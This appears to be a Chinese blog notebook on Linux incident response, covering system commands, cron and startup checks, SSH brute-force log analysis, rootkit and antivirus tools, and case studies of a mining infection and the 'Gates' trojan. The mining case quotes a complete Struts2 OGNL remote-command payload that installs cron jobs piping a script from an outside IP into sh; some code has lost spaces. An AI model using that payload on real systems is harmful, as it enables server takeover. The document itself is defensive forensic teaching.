[关闭]
@1kbfree 2019-05-16T04:18:12.000000Z 字数 12500 阅读 1338

linux应急响应

应急响应


文件夹介绍

image_1dau6mcga1c1f1ooo16pm1ctd1srm1j.png-74kB

image_1dau6n85f1iuhe8m1gs61vdl1vft20.png-62.3kB

image_1dau6qimqjfutmt1n6omvh192g2d.png-72.4kB

image_1dau6s4m4as61fpusoa19am1t872q.png-13.4kB

image_1dau6sjq21ae9p9ef3qt2147v37.png-6kB

image_1dau6t5eo1l2915s29lhbtteur3k.png-4.8kB

image_1dau70dohgnqhll1shi5qt1ekn41.png-113.5kB

image_1dau710pu1d0lsp0qaa1nv5deb4e.png-14.9kB

用户组概念

image_1dau74f82fkh1dk228ivi1o3r4r.png-79.2kB

权限概念

https://blog.csdn.net/qq_28451255/article/details/80468712

image_1dau7mphp1eae6pod8b1l1ni1p58.png-53.8kB

image_1dau8st1e1fph1hot1trs1f3truc65.png-94.9kB

stat命令

image_1dau8vbhl10u41bbjp0o1gg71ano6v.png-220.6kB

image_1dau8ug3n18321h6lh0i1a2g12s86i.png-79.3kB

ls

image_1dau9166t170v1oia1q9c1fcm887c.png-29.8kB

netstae

image_1dau957r41ujqm5qg6lcff1o487p.png-35.8kB

  1. 22端口的链接情况 netstat -anplt|grep 22

image_1daueiseuqfgpmhs7i5lj1kfsdu.png-256.9kB

lsod

1.png-26.5kB

  1. lsof -i :80
  2. 查看端口为80tcpudp进程
ps

查进程

image_1dau9ofmdt07ftc10uj1bkr1kqb8i.png-29.7kB

top/htop

进程

tophtopwindow任务管理器一样

grep

查文件内容

image_1dau9stpuqghncd91ikpooji8v.png-54.7kB

  1. -i 忽略大小写
  2. -v 不包含匹配字符
  1. egrep -v "root|test" /etc/passwd 过滤passwd文件的roottest的内容
  2. egrep "root|test" /etc/passwd 只查找passwd文件的roottest的内容
tcpdump

抓包

image_1daua5oit10p21o59a8vop01abu9s.png-112.1kB

find

查文件名

image_1dauaailg5md1st41l9a17c1bgia9.png-91.5kB

image_1dauajgse11m5j4mlvl9662a7am.png-111.1kB

which

看程序所在位置

image_1dauaq29h1158jcc1fl61aomilb3.png-20.5kB

.bash_history

看执行历史命令

image_1daub45k9h28q1i11251k2f11m3bg.png-62.4kB

一般用法,进入tmp目录把历史执行命令保存到这里

image_1daub92kup8t1b1r11cor901i41bt.png-69.6kB

把所有结果集合起来

image_1daubgmgsfgi1daj1spas2s1cjdca.png-103.5kB

检测系统关键文件

1、用户信息文件/etc/passwd

  1. root:x\:0:0:root:/root:/bin/bash
  2. account:password:UID:GID:GECOS:directory:shell

对应的信息:

  1. 用户名:密码:用户ID:组ID:用户说明:家目录:登陆之后shell

无密码只允许本机登陆,远程不允许登陆

2、影子文件/etc/shadow

  1. root:$6$oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1DpYxTCVvI/:16809:0:99999:7:::
  2. 用户名:加密密码(可以看强弱来判断是否可能出现弱口令导致被直接爆破的):密码最后一次修改日期:两次密码的修改时间间隔:密码有效期:密码修改到期到的警告天数:密码过期之后的宽限天数:账号失效时间:保留

3、用户组/etc/group

image_1daubteerqhfunbc1f1tjg1lufcn.png-15kB

4、用户登录时都会运行的环境变量设置/etc/profile

检测开机启动项

image_1daucrahmqte2t71ib1lqg16u6d4.png-47.2kB

查看运行级别

  1. runlevel

系统默认允许级别

  1. vi /etc/inittab
  2. id=3initdefault 系统开机后直接进入哪个运行级别

开机启动配置文件

  1. /etc/rc.local
  2. /etc/rc.d/rc[0~6].d

例子:当我们需要开机启动自己的脚本时,只需要将可执行脚本丢在 /etc/init.d 目录下,然后在 /etc/rc.d/rc*.d 中建立软链接(window的快捷方式)即可

  1. root@localhost ~]# ln -s /etc/init.d/sshd /etc/rc.d/rc3.d/S100ssh

此处 sshd 是具体服务的脚本文件,S100ssh 是其软链接,S 开头代表加载时自启动;如果是 K 开头的脚本文件,代表运行级别加载时需要关闭的。

入侵排查

启动项文件

  1. more /etc/rc.local
  2. /etc/rc.d/rc[0~6].d
  3. ls -l /etc/rc.d/rc3.d/

定时任务

1、利用 crontab 创建计划任务
  1. crontab -l 列出某个用户 cron 服务的详细内容
  2. crontab -r 删除每个用户 cront 任务(谨慎:删除所有的计划任务)
  3. crontab -e 使用编辑器编辑当前的 crontab 文件

默认编写的 crontab 文件会保存在 ( /var/spool/cron/用户名 例如: /var/spool/cron/root

如:*/1 * * * * echo "hello world" >> /tmp/test.txt 每分钟写入文件

2、利用 anacron 实现异步定时任务调度

每天运行 /home/backup.sh 脚本:

  1. vi /etc/anacrontab
  2. @daily 10 example.daily /bin/bash /home/backup.sh

当机器在 backup.sh 期望被运行时是关机的,anacron 会在机器开机十分钟之后运行它,而不用再等待 7 天。

3、重点关注以下目录是否存在脚本
  1. /var/spool/cron/*
  2. /etc/crontab
  3. /etc/cron.d/*
  4. /etc/cron.daily/*
  5. /etc/cron.hourly/*
  6. /etc/cron.monthly/*
  7. /etc/cron.weekly/
  8. /etc/anacrontab
  9. /var/spool/anacron/*

小技巧:

  1. more /etc/cron.daily/* 查看目录下所有文件

服务自启动

第一种修改方法:
  1. chkconfig [--level 运行级别][独立服务名][on|off]
  2. chkconfig level 2345 httpd on 开启自启动
  3. chkconfig httpd on (默认 level 2345
第二种修改方法:
  1. 修改 /etc/re.d/rc.local 文件
  2. 加入 /etc/init.d/httpd start
第三种修改方法:
  1. 使用 ntsysv 命令管理自启动,可以管理独立服务和 xinetd 服务。

查询已安装的服务

  1. chkconfig --list 查看服务自启动状态,可以看到所有的RPM包安装的服务
  2. ps aux | grep crond 查看当前服务

系统在35的级别下启用

  1. chkconfig --list | grep "3:启用|5:启用"

查看服务安装位置 ,一般是在 /user/local/

  1. service httpd start

搜索 /etc/rc.d/init.d/ 查看是否存在

系统日志

  1. 日志默认存放位置:/var/log/
  2. 查看日志配置情况:more /etc/rsyslog.conf

image_1daudq0dfhbi289qnp3rq7uqdh.png-321.8kB

日志分析技巧

1、定位有多少IP在爆破主机的 root 帐号:

  1. grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

定位有哪些 IP 在爆破:

  1. grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c

爆破用户名字典是什么?

  1. grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr

2、登录成功的 IP 有哪些:

  1. grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

登录成功的日期、用户名、IP:

  1. grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'

3、增加一个用户 kali 日志:

  1. Jul1000:12:15localhostuseradd[2382]: newgroup: name=kali, GID=1001
  2. Jul1000:12:15localhostuseradd[2382]: newuser: name=kali, UID=1001, GID=1001, home=/home/kali
  3. , shell=/bin/bash
  4. Jul1000:12:58localhostpasswd: pam_unix(passwd:chauthtok): passwordchangedforkali
  5. #grep"useradd"/var/log/secure

4、删除用户 kali 日志:

  1. Jul1000:14:17localhostuserdel[2393]: deleteuser'kali'
  2. Jul1000:14:17localhostuserdel[2393]: removedgroup'kali' ownedby'kali'
  3. Jul1000:14:17localhostuserdel[2393]: removedshadowgroup'kali' ownedby'kali'
  4. #grep"userdel"/var/log/secure

5、su 切换用户:

  1. Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid=0)

sudo 授权执行:

  1. sudo -lJul 10 00:43:09 localhost sudo: good : TTY=pts/4 ; PWD=/home/good ; USER=root ; COMMAND=/sbin/shutdown -r now

工具篇

一、Rootkit 查杀

  1. chkrootkit :
  2. http://www.chkrootkit.org
使用方法:
  1. wgetftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
  2. tar zxvf chkrootkit.tar.gz
  3. cdchkrootkit-0.52
  4. makesense
  5. #编译完成没有报错的话执行检查
  6. ./chkrootkit

二、rkhunter

  1. rkhunter
  2. http://rkhunter.sourceforge.net
使用方法:
  1. Wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz
  2. tar -zxvfrkhunter-1.4.4.tar.gz
  3. cdrkhunter-1.4.4
  4. ./installer.sh --install
  5. rkhunter -c

二、病毒查杀

三、Clamav

  1. ClamAV 的官方下载地址为:
  2. http://www.clamav.net/download.html
安装方式一:

1、安装 zlib

  1. wgethttp://nchc.dl.sourceforge.net/project/libpng/zlib/1.2.7/zlib-1.2.7.tar.gz
  2. tar -zxvfzlib-1.2.7.tar.gz
  3. cdzlib-1.2.7
  4. #安装一下gcc编译环境: yum install gcc
  5. CFLAGS="-O3 -fPIC"./configure --prefix=/usr/local/zlib/
  6. make&& makeinstall

2、添加用户组 clamav 和组成员 clamav

  1. groupadd clamav
  2. useradd -gclamav -s/bin/false -c"Clam AntiVirus"clamav

3、安装 Clamav

  1. tar zxvf clamav-0.97.6.tar.gz
  2. cdclamav-0.97.6
  3. ./configure --prefix=/opt/clamav --disable-clamav-with-zlib=/usr/local/zlib
  4. make
  5. makeinstall

4、配置 Clamav

  1. mkdir/opt/clamav/logs
  2. mkdir/opt/clamav/updata
  3. touch/opt/clamav/logs/freshclam.log
  4. touch/opt/clamav/logs/clamd.log
  5. cd/opt/clamav/logs
  6. chownclamav:clamav clamd.log
  7. chownclamav:clamav freshclam.log

5、ClamAV 使用:

  1. /opt/clamav/bin/freshclam 升级病毒库
  2. ./clamscan h 查看相应的帮助信息
  3. ./clamscan -r /home 扫描所有用户的主目录就使用
  4. ./clamscan -r --bell -i /bin 扫描 bin 目录并且显示有问题的文件的扫描结果

安装方式二:

  1. #安装
  2. yum install -yclamav
  3. #更新病毒库
  4. freshclam
  5. #扫描方法
  6. clamscan -r/etc --max-dir-recursion=5-l/root/etcclamav.log
  7. clamscan -r/bin --max-dir-recursion=5-l/root/binclamav.log
  8. clamscan -r/usr --max-dir-recursion=5-l/root/usrclamav.log
  9. #扫描并杀毒
  10. clamscan -r --remove/usr/bin/bsd-port
  11. clamscan -r --remove/usr/bin/
  12. clamscan -r--remove/usr/local/zabbix/sbin
  13. #查看日志发现
  14. cat/root/usrclamav.log |grep FOUND

四、webshell 查杀

linux 版:

河马 webshell 查杀:

  1. http://www.shellpub.com

深信服 Webshell 网站后门检测工具:

  1. http://edr.sangfor.com.cn/backdoor_detection.html

五、RPM check 检查

系统完整性可以通过 rpm 自带的 -Va 来校验检查所有的 rpm 软件包,查看哪些命令是否被替换了:

  1. ./rpm -Va > rpm.log

如果一切均校验正常将不会产生任何输出,如果有不一致的地方,就会显示出来,输出格式是 8 位长字符串,每个字符都用以表示文件与 RPM 数据库中一种属性的比较结果 ,如果是. (点) 则表示测试通过。

验证内容中的 8 个信息的具体内容如下:

  1. S文件大小是否改变
  2. M文件的类型或文件的权限(rwx)是否被改变
  3. 5文件 MD5 校验是否改变(可以看成文件内容是否改变)
  4. D设备中,从代码是否改变
  5. L文件路径是否改变
  6. U文件的属主(所有者)是否改变
  7. G文件的属组是否改变
  8. T文件的修改时间是否改变
  9. 如果命令被替换了,如何还原回来:
  10. 文件提取还原案例:
  11. rpm -qf /bin/ls 查询ls命令属于哪个软件包
  12. mv /bin/ls /tmp 先把 ls 转移到 tmp 目录下,造成 ls 命令丢失的假象
  13. rpm2cpio /mnt/cdrom/Packages/coreutils-8.4-19.el6.i686.rpm | cpio -idv ./bin/ls 提取 rpm 包中 ls 命令到当前目录的 /bin/ls
  14. cp /root/bin/ls /bin/ ls 命令复制到 /bin/ 目录 修复文件丢失

实战1 - SSH异常

日志分析

SSH 端口异常,我们首先有必要先来了解一下系统账号情况

A、系统账号情况

1、除 root 之外,是否还有其它特权用户 (uid 为 0)

  1. [root@localhost ~]# awk -F: '$3==0{print $1}' /etc/passwd
  2. root

2、可以远程登录的帐号信息

  1. [root@localhost ~]# awk '/$1|$6/{print $1}' /etc/shadow
  2. root:$6$38cKfZDjsTiUe58V$FP.UHWMObqeUQS1Z2KRj/4EEcOPi.6d1XmKHgK3j3GY9EGvwwBei7nUbbqJC./qK12HN8jFuXOfEYIKLID6hq0::0:99999:7:::

我们可以确认目前系统只有一个管理用户 root。

接下来,我们想到的是 /var/log/secure,这个日志文件记录了验证和授权方面的信息,只要涉及账号和密码的程序都会记录下来。

B、确认攻击情况

1、统计了下日志,发现大约有 126254 次登录失败的记录,确认服务器遭受暴力破解

  1. [root@localhost ~]# grep -o "Failed password" /var/log/secure|uniq -c
  2. 126254 Failed password

2、输出登录爆破的第一行和最后一行,确认爆破时间范围

  1. [root@localhost ~]# grep "Failed password" /var/log/secure|head -1
  2. Jul 8 20:14:59 localhost sshd[14323]: Failed password for invalid user qwe from 111.13.xxx.xxx port 1503 ssh2
  3. [root@localhost ~]# grep "Failed password" /var/log/secure|tail -1
  4. Jul 10 12:37:21 localhost sshd[2654]: Failed password for root from 111.13.xxx.xxx port 13068 ssh2

3、进一步定位有哪些 IP 在爆破

  1. [root@localhost ~]# grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c | sort -nr
  2. 12622 23.91.xxx.xxx 8942 114.104.xxx.xxx 8122 111.13.xxx.xxx 7525 123.59.xxx.xxx ...................

4、爆破用户名字典都有哪些?

  1. [root@localhost ~]# grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr
  2. 9402 root 3265 invalid user oracle 1245 invalid user admin 1025 invalid user user .....................

C、管理员最近登录情况:

1、登录成功的日期、用户名、IP

  1. [root@localhost ~]# grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
  2. Jul 9 09:38:09 root 192.168.143.100Jul 9 14:55:51 root 192.168.143.100Jul 10 08:54:26 root 192.168.143.100Jul 10 16:25:59 root 192.168.143.100............................

通过登录日志分析,并未发现异常登录时间和登录IP

2、顺便统计一下登录成功的 IP 有哪些

  1. [root@localhost ~]# grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
  2. 27 192.168.204.1

通过日志分析,发现攻击者使用了大量的用户名进行暴力破解,但从近段时间的系统管理员登录记录来看,并未发现异常登录的情况,需要进一步对网站服务器进行入侵排查,这里就不再阐述。

处理措施

SSH暴力破解依然十分普遍,如何保护服务器不受暴力破解攻击,总结了几种措施:

  1. 禁止向公网开放管理端口,若必须开放应限定管理 IP 地址并加强口令安全审计(口令长度不低于 8 位,由数字、大小写字母、特殊字符等至少两种以上组合构成)。

  2. 更改服务器 ssh 默认端口。

  3. 部署入侵检测设备,增强安全防护。

应急响应实战之短连接

短连接(short connnection)是相对于长连接而言的概念,指的是在数据传送过程中,只在需要发送数据时,才去建立一个连接,数据发送完成后,则断开此连接,即每次连接只完成一项业务的发送。 在系统维护中,一般很难去察觉,需要借助网络安全设备或者抓包分析,才能够去发现。

应急场景

某天,网络管理员在出口 WAF 检测到某台服务器不断向香港I发起请求 ,感觉很奇怪,登录服务器排查,想要找到发起短连接的进程。

日志分析

登录服务器查看端口、进程,并未发现发现服务器异常,但是当多次刷新端口连接时,可以查看该连接。 有时候一直刷这条命令好十几次才会出现,像这种的短连接极难捕捉到对应的进程和源文件。

image_1dauf89vvji28d91gh51mcm1duseb.png-374.4kB

手动捕捉估计没戏,很难追踪,于是动手写了一段小脚本来捕捉短连接对应的pid和源文件。

脚本文件如下:

  1. #!/bin/bash
  2. ip=118.184.15.40
  3. i=1
  4. while:
  5. do
  6. tmp=netstat -anplt|grep $ip|awk -F'[/]''{print $1}'|awk '{print $7}'
  7. #echo $tmp
  8. iftest -z"$tmp"
  9. then
  10. ((i=i+1))
  11. else
  12. forpid in$tmp; do
  13. echo"PID: "${pid}
  14. result=`ls -lh /proc/$pid|grep exe`
  15. echo"Process: "${result}
  16. kill-9$pid
  17. done
  18. break
  19. fi
  20. done
  21. echo"Total number of times: "${i}

运行结果如下:

image_1daufb8d71ii11v7imge1isq1tqveo.png-21.6kB

跑了三次脚本,可以发现短连接每次发起的进程 Pid 一直在变,但已经捕捉到发起该异常连接的进程源文件为 /usr/lib/nfsiod

小结

本文简单介绍了短连接以及捕捉短连接源文件的技巧,站在安全管理员的角度,应加强对网络安全设备的管理,在网络层去发现更多在系统层很难察觉的安全威胁。

应急响应实战之挖矿病毒

随着虚拟货币的疯狂炒作,利用挖矿脚本来实现流量变现,使得挖矿病毒成为不法分子利用最为频繁的攻击方式。新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染的成功率,通过利用永恒之蓝(EternalBlue)、web 攻击多种漏洞(如 Tomcat 弱口令攻击、Weblogic WLS 组件漏洞、Jboss 反序列化漏洞、Struts2 远程命令执行等),导致大量服务器被感染挖矿程序的现象 。

应急场景

某天,安全管理员在登录安全设备巡检时,发现某台网站服务器持续向境外IP发起连接,下载病毒源:

image_1daugme8rmg4cmpi0212mp4odf5.png-349.8kB

事件分析

A、排查过程

登录服务器,查看系统进程状态,发现不规则命名的异常进程、异常下载进程

image_1daugogrf1d2h1lbocp1g3p1ijefi.png-92.6kB

image_1daugpfq61iekbp1rs4iccqjrfv.png-143.7kB

下载 logo.jpg,包含脚本内容如下

image_1daugtgppuss1kd8a1h1p5s1eumgc.png-391.2kB

到这里,我们可以发现攻击者下载 logo.jpg 并执行了里面了 shell 脚本,那这个脚本是如何启动的呢?

通过排查系统开机启动项、定时任务、服务等,在定时任务里面,发现了恶意脚本,每隔一段时间发起请求下载病毒源,并执行 。

image_1daugvc5o13eipur1rsbklq1aeigp.png-188.8kB

B、溯源分析

Tomcat log 日志中,我们找到这样一条记录

image_1dauh2ganpnnfd7h0mljac27h6.png-156.4kB

对日志中攻击源码进行摘录如下

  1. {(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh\n*/19 * * * * curl http://5.188.87.11/icons/logo.jpg|sh" | crontab -;wget -O - -q http://5.188.87.11/icons/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

可以发现攻击代码中的操作与定时任务中异常脚本一致,据此推断黑客通过 Struct 远程命令执行漏洞向服务器定时任务中写入恶意脚本并执行。

C、清除病毒

1、删除定时任务

image_1dauh5q2r1jfqhl7fjd1d261aq0hj.png-226.9kB

2、终止异常进程

image_1dauh6bk4196j1clkt8u1e0d2hsi0.png-101.2kB

防范措施

针对服务器被感染挖矿程序的现象,总结了几种预防措施:

1、安装安全软件并升级病毒库,定期全盘扫描,保持实时防护

2、及时更新 Windows 安全补丁,开启防火墙临时关闭端口

3、及时更新 web 漏洞补丁,升级 web 组件

应急响应实战之盖茨木马

Linux 盖茨木马是一类有着丰富历史,隐藏手法巧妙,网络攻击行为显著的 DDoS 木马,主要恶意特点是具备了后门程序,DDoS 攻击的能力,并且会替换常用的系统文件进行伪装。木马得名于其在变量函数的命名中,大量使用 Gates 这个单词。分析和清除盖茨木马的过程,可以发现有很多值得去学习和借鉴的地方。

应急场景

某天,网站管理员发现服务器 CPU 资源异常,几个异常进程占用大量网络带宽:

image_1dauhda2n17c41qgd14ao2l21cpid.png-436.6kB

事件分析

异常 IP 连接

image_1dauhe6qr15t4kh21g2j1clf749iq.png-188.5kB

异常进程

查看进行发现 ps aux 进程异常,进入该目录发现多个命令,猜测命令可能已被替换

登录服务器,查看系统进程状态,发现不规则命名的异常进程、异常下载进程

image_1dauhkmjd16r51d9h1chrbt11bhmj7.png-377.9kB

异常启动项

进入rc3.d目录可以发现多个异常进行:

  1. /etc/rc.d/rc3.d/S97DbSecuritySpt
  2. /etc/rc.d/rc3.d/S99selinux

image_1dauhn4jn8jev43bh1bcvnjijk.png-204.4kB

image_1dauhnpr5119th7s1c7f1egpgupkd.png-116.5kB

搜索病毒原体

  1. find / -size -1223124c -size +1223122c -exec ls -id {} \; 搜索 1223123 大小的文件

从以上种种行为发现该病毒与“盖茨木马”有点类似,具体技术分析细节详见:

Linux平台“盖茨木马”分析

http://www.freebuf.com/articles/system/117823.html

悬镜服务器卫士丨Linux平台“盖茨木马”分析

http://www.sohu.com/a/117926079_515168

手动清除木马过程:

1、简单判断有无木马

  1. #有无下列文件
  2. cat/etc/rc.d/init.d/selinux
  3. cat/etc/rc.d/init.d/DbSecuritySpt
  4. ls/usr/bin/bsd-port
  5. ls/usr/bin/dpkgd
  6. #查看大小是否正常
  7. ls-lh/bin/netstat
  8. ls-lh/bin/ps
  9. ls-lh/usr/sbin/lsof
  10. ls-lh/usr/sbin/ss

2、上传如下命令到 /root

  1. ps netstat ss lsof

3、删除如下目录及文件

  1. rm-rf/usr/bin/dpkgd (ps netstat lsof ss)
  2. rm-rf/usr/bin/bsd-port #木马程序
  3. rm-f/usr/bin/.sshd #木马后门
  4. rm-f/tmp/gates.lod
  5. rm-f/tmp/moni.lod
  6. rm-f/etc/rc.d/init.d/DbSecuritySpt(启动上述描述的那些木马变种程序)
  7. rm-f/etc/rc.d/rc1.d/S97DbSecuritySpt
  8. rm-f/etc/rc.d/rc2.d/S97DbSecuritySpt
  9. rm-f/etc/rc.d/rc3.d/S97DbSecuritySpt
  10. rm-f/etc/rc.d/rc4.d/S97DbSecuritySpt
  11. rm-f/etc/rc.d/rc5.d/S97DbSecuritySpt
  12. rm-f/etc/rc.d/init.d/selinux(默认是启动/usr/bin/bsd-port/getty)
  13. rm-f/etc/rc.d/rc1.d/S99selinux
  14. rm-f/etc/rc.d/rc2.d/S99selinux
  15. rm-f/etc/rc.d/rc3.d/S99selinux
  16. rm-f/etc/rc.d/rc4.d/S99selinux
  17. rm-f/etc/rc.d/rc5.d/S99selinux

4、找出异常程序并杀死

5、删除含木马命令并重新安装

命令替换

RPM check 检查

系统完整性也可以通过 rpm 自带的 -Va 来校验检查所有的 rpm 软件包,有哪些被篡改了,防止 rpm 也被替换,上传一个安全干净稳定版本 rpm 二进制到服务器上进行检查

  1. ./rpm -Va > rpm.log

如果一切均校验正常将不会产生任何输出。如果有不一致的地方,就会显示出来。输出格式是8位长字符串, c 用以指配置文件, 接着是文件名. 8 位字符的每一个 用以表示文件与 RPM 数据库中一种属性的比较结果 。. (点) 表示测试通过。.下面的字符表示对 RPM 软件包进行的某种测试失败:

命令替换

  1. rpm2cpio 包全名 | cpio -idv .文件绝对路径 rpm 包中文件提取
  2. Rpm2cpio rpm 包转换为 cpio 格式的命令
  3. Cpio 是一个标准工具,它用于创建软件档案文件和从档案文件中提取文件
  4. Cpio 选项 < [文件|设备]
  5. -icopy-in 模式,还原-d:还原时自动新建目录-v:显示还原过程

文件提取还原案例

查询ls命令属于哪个软件包

  1. rpm -qf /bin/ls
  2. mv /bin/ls /tmp

提取rpm包中ls命令到当前目录的 /bin/ls

  1. rpm2cpio /mnt/cdrom/Packages/coreutils-8.4-19.el6.i686.rpm | cpio -idv ./bin/ls

ls 命令复制到 /bin/ 目录 修复文件丢失:

  1. cp /root/bin/ls /bin/

挂载命令 rpm 包:

  1. mkdir /mnt/chrom/ 建立挂载点
  2. mount -t iso9660 /dev/cdrom /mnt/cdrom/ 挂在光盘
  3. mount/dev/sr0 /mnt/cdrom/

卸载命令

  1. umount 设备文件名或挂载点
  2. umount /mnt/cdrom/
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注